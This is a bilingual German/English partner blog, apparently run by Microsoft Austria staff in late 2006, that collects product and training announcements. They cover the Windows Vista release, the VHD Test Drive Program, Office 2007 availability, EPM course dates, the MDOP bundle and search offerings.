• "Today we are announcing the Release to Manufacturing of Windows Vista.  This is a significant milestone for Microsoft and our partners, and one we are very excited about"
  
• Windows Vista is the most tested release ever. This is the first Microsoft product that has incorporated the Secure Development Lifecycle from the beginning, and has employed stringent quality gates for each release milestone
  
• We’ve had millions of downloads of the pre-release versions, and there are already over 60,000 machines at Microsoft running Windows Vista—more than any prior Windows release at RTM

Let´s get ready for Vista!!! ;-)

Martin Berka

Virtuelle Maschinen sind sicher schon allgemein bekannt und auch mehr oder weniger konträr diskutiert, allerdings ist die fantastische Möglichkeit Software ohne Installations- und Konfigurationsaufwand gefahrlos ausprobieren zu können unbestritten.

Dementsprechend wird auch bei Microsoft ein weiterer Meilenstein in diese Richtung gesetzt.

Als Kurzinformation folgende "Zusammenfassung" :)

Today, November 6, 2006, Microsoft announced the VHD Test Drive Program to enable customers and partners to confidently evaluate mainstream enterprise software from Microsoft and partners in a fraction of the time. At launch, we will have pre-configured VHDs of Windows Server 2003 R2 and key Microsoft applications such as SQL Server, ISA Server, and Exchange Server + Live Communication Server. With the VHD Test Drive Program, we will also enable our partners for the first time to now be able to distribute their applications and solutions as a pre-configured VHD built on top of Windows Server 2003 R2 and leveraging other Microsoft applications.

Over the past 12-18 months, we have built up significant momentum behind Microsoft’s virtualization solutions with licensing changes, new releases of virtualization platforms, acquisition of Softricity, and the pre-announcement of Windows Server virtualization availability to be within 180 days of Windows Server “Longhorn” RTM. Today marks another milestone for not just virtualization but a new paradigm in how the Industry looks at evals and potentially could become a new software distribution mechanism.

Engage today and start talking to our ISV partners to build integrated solutions with the complete Microsoft stack and help change the customer experience and provide a new opportunity for partners to expand their eval distribution reach. Today we expect more than 20 partners to begin distributing their software via the VHD Test Drive Program later this quarter, including Altiris, BEA Systems, Check Point, Citrix, Computer Associates, CommVault, Dell, FullArmor, HP, Network Appliance, Platespin, Portlock, Quest Software, SourceCode Technology Holdings, Symantec and UGS. Looking forward, we anticipate to get more than $10B worth of software into the hands of the IT Professionals to evaluate.

What can you expect from this launch? – This is not just a virtualization announcement but rather a change in the software evaluation paradigm for mainstream applications. Expect to see several press articles, lots of blog pick up and lots of web hits for the www.microsoft.com/vhd site and of course.. a ton of VHD downloads.

Get ready to join the program and grow the awareness for the various Microsoft and partner solutions, while helping increase the virtualization awareness. With several hundred thousand IT Pros and partners beings touched by this program, this is shaping up to be another exciting chapter for virtualization and Microsoft.

-----------------------------
 Christian Hrubesch

Diese Demo zeigt Ihnen, wie außergewöhnlich Visio 2007 als Tool für IT- und Business-Experten ist, die Systeme, Prozesse und andere Information visualisieren möchten, weil es ihnen um Einsicht und Kommunikation geht.

http://office.microsoft.com/de-at/visio/default.aspx

lg Andreas Hack

Hands-on technical training zu den Themen

• Deploying,
• Implementing und 
• Administering

mit kostenlosen Online Trainings: http://go.microsoft.com/?linkid=5590624

Leo 

I am happy to announce that registration is now live for the majority of the EPMU training we will deliver this year. 

A couple things to note from the last communication I sent on this.  We have moved out the first training for the Selling and Architecting course to ensure we have all the final course materials which have been slightly delayed.  We have added back in the April dates, but will be monitoring all courses to ensure these are filled and may cancel these if we run into low attendance numbers.  Registration for the Implementation course is not yet live as we are waiting on course description from the US.  This will be sent to you as soon as it is ready.

Training Fees – As previously communicated partners will have to pay for this training. 

Courses and Dates:

Selling EPM and Architecting an EPM Solution Basics

Maidenhead, UK              TBC, Fall 2006

Istanbul, Turkey               November 13-15, 2006

Prague, Czech Rep.         November 20-22, 2006

Warsaw, Poland               December 4-6, 2006

Munich, Germany           April 2-4, 2007

Maidenhead, UK              April 23-25, 2007

Intro to Microsoft Project Portfolio Server

Maidenhead, UK              November 2-3, 2006

Istanbul, Turkey               November 6-7, 2006

Bucharest, Romania        February 6-7, 2006

Microsoft Portfolio Server Deep Dive

Munich, Germany           November 14-17, 2006

Milan, Italy                          December 12-15 (sponsored by Italian sub, so first come basis will be offered to Italian partners)

Maidenhead, UK              January 23-26, 2006

Implementing Enterprise Project Management Server – registration TBC

Maidenhead, UK              November 6-8, 2006

Manama, Bahrain            January 9-11, 2007

Munich, Germany           February 5-7, 2007

Prague, Czech Rep.         February 19-21, 2007

Leo

2007 Microsoft Office programs will be produced in over thirty eight languages. Microsoft will begin to ship installation media in English, French, German, Spanish, Japanese, Korean, Chinese and Arabic to volume licensing customers starting in early January. Additional languages will be forthcoming between February and May.  

If you are interested in testing or deploying the 2007 Office system prior to the arrival of your installation media kit you may download products from a secure volume licensing website.  The website will have products available within days of being released from Microsoft’s development labs. Microsoft expects to start having the very first individual products available for download by mid November. The download website is the fastest way to obtain installation media.

Depending upon the volume licensing program you participate in you will need to visit one of two sites.

soeben haben wir das Mail von Jeff Raikes erhalten, dass das 2007 Office System seit einer halben Stunde released ist.

Mir geht es darum diesen Moment kurz festzuhalten. Die deutsche Version wird am 20. November fertig sein.

Martin

ist ein Tool mit dem man sehr schenll Blogs schreiben kann. Download at: http://windowslivewriter.spaces.live.com/

Man startet das Ding am Desktop nach der Installation, die SW verbindet sich zum Blogserver (egal welcher, muss nicht von MS sein) und man schreibt drauf los. Publish und fertig. Die Einbindung von live.local Wegbeschreibungen ist vorgesehen.

Graphiken und formatieren natürlich möglich.

 Martin

gibt eine Übersicht, was Demo Shocase ist und wie man es verwendet. Im Wesentlichen handelt es sich um virtuelle Maschinen mit denen man das Zusammenspiel der gesamten Microsoft Software gut demonstrieren kann. z.B. wie sind CRM und Sharepoint und Office miteinander integrierbar und in welchen Business Szenarien man dieses Produktset einsetzen koennte.

Steht nur für Certified Partner zur Verfügung.
Die Version mit Office 2007 und Vista sowie Sharepoint 2007 ist für Mitte Jänner angekündigt und wird an certified Partner automatisch verschickt.

zum Online Training - was ist Demo Shocase

WIe kürzlich angekündigt, werden wir - exklusiv für Software Assurance Kunden - das Microsoft Desktop Optimization Pack for Software Assurance (MDOP for SA) zur Verfügung stellen. Es handelt sich dabei um 4 Produkte in einem Paket, die zur Reduktion der TCO von Windows Clients in Unternehmen beitragen sollen.

Das MDOP Bundle enthält:

·         Microsoft SoftGrid: Deployment von Applikationen ohne diese installieren zu müssen (virtual Streaming)

·         Microsoft Asset Inventory Service: Gehostete Software Inventur von über 430.000 Anwendungen ohne Agent Installation

·         Microsoft Advanced Group Policy Management: Rollenbasierendes GP Management mit Roll-back inkl. Delegationsmodell

·         Microsoft Diagnostics and Recovery Toolset: Sammlung von System Tools auch für die Offline Nutzung (z.B. Recovery)

Detaillierte Informationen dazu gibt es aktuell nur englischsprachig auf der Seite http://www.windowsvista.com/optimizeddesktop. Neben allen Informationen der nunmehrigen Microsoft Produkte in diesem Bundle finden Sie auch Informationen auf den Webseiten der Firmen vor der Akquisition.

SoftGrid: http://www.softricity.com

Asset Inventory Service: http://www.assetmetrix.com

Advanced Group Policy Management: http://www.desktopstandard.com

Diagnostics and Recovery Toolset: http://www.winternals.com, http://www.sysinternals.com

Insbesonders die SoftGrid Technologien sind sehr spannend !  Bitte anschauen, nutzen und vor allem: Kunden erzählen, die dabei sind, neue Lizenzverträge abzuschliessen. SA ist weitaus mehr als nur das Recht, neue Lizenzen einzusetzen.

Christian

Im Zuge meiner Tätigkeit als Search-Champ der Microsoft Österreich komme ich wieder drauf, dass es eine gewisse Unsicherheiten gibt bezüglich des diesbezüglichen Microsoft Offerings. 

Das Microsoft Angebot in Bezug auf Search ist (bedauerlicherweise) 3-geteilt:

• Die WDS (Windows Desktop Search) ist die Suchmaschine für lokale Maschine und ist von vornherein built in bei Windows Vista. D.h. das Positionieren von WDS 2.6.5. (und den Nachfolgeversionen) macht nur Sinn bei Kunden, die noch WinXP verwenden (und noch länger verwenden wollen). Die nächste Version dieser WDS wird Casino heißen.
• Die Suchmaschine für Intranet-, (Notes- etc.) und FileShare-Content heißt SPPS bzw. MOSS.
• Die Suchmaschine für das Internet heißt www.live.com

Eines Tages wird das alles unter EINER Haube laufen. Dafür gibt es momentan noch kein konkretes Datum. Ich halte euch auf dem Laufenden.

As part of our continuous publishing model, the Microsoft CRM 3.0 Implementation Guide version 3.0.5 has just been released. This release is the culmination of dozens of revisions, corrections, and additions.

With this release, the Implementation Guide now contains the following information:

• Microsoft CRM client for Microsoft Office Outlook memory requirements update.
• Information about SQL named instances support.
• Pre-existing Microsoft CRM 1.2 callout support.

You can download the update from the following link:

(Link zur deutschen Version)

http://www.microsoft.com/downloads/details.aspx?displaylang=de&FamilyID=1ff067f8-4f77-40f0-ae9c-68ada7d4f16a

Download verfügbar unter:
http://www.microsoft.com/downloads/details.aspx?FamilyID=4628fca6-388d-45bc-a154-453b920dbcb8&DisplayLang=en

wir werden hier versuchen Euch

• die neuesten technischen presales Infos bereitzustellen.
• case studies vorstellen
• hie und da einen Bericht geben, was uns intern geglückt und nicht gelückt ist.

Für Partner hat es den Vorteil, dass Ihr von unseren Mails nicht mehr zugeschüttet werdet. Für uns hat es den Vorteil, dass wir keine Sorgen wegen Datenschutz und Massenmails und Robinson Listen mehr haben.

Freu mich schon zu sehen, wie wir dieses Medium nutzen können!

JEDES FEEDBACK IST UNS WICHTIG !

Martin Schmöllerl